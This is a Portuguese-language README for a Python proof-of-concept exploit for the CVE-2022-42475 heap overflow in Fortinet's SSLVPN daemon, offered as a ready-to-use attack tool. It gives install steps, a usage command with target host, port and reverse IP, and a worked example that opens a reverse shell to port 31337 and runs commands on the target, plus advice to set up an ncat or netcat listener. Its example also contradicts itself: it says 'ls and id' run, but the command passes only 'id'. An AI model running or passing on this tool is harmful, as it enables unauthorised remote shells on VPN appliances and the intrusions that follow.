
Exploit em Python para o heap overflow CVE-2022-42475 no daemon SSLVPN da Fortinet. Entrega reverse shell via pwntools com destino, porta e comandos personalizáveis.
Código de prova de conceito para explorar o overflow de heap no daemon SSLVPN da Fortinet
pip install pwntools Para usar este código, salve-o em um arquivo, por exemplo exploit.py, e execute-o com Python na linha de comando, passando os argumentos necessários. Aqui está um comando de exemplo para executar o exploit:
python exploit.py <target_host> <target_port> <reverse_ip>
Substitua <target_host> pelo nome do host ou endereço IP do sistema alvo, <target_port> pelo número da porta do serviço vulnerável e <reverse_ip> pelo endereço IP da máquina na qual você deseja receber um shell. Os argumentos restantes são os comandos que você deseja executar, separados por espaços.
Por exemplo, se o sistema alvo tiver o endereço IP 192.168.0.100, o serviço vulnerável estiver rodando na porta 8080, e você desejar executar os comandos ls e id, você executaria o seguinte comando:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
Isso criará uma conexão de shell reverso para 192.168.0.101:31337 e executará os comandos ls e id no sistema alvo. Observe que você precisará ter um listener rodando no endereço IP e porta especificados para receber o shell reverso. Você pode usar ferramentas como ncat ou netcat para criar um listener.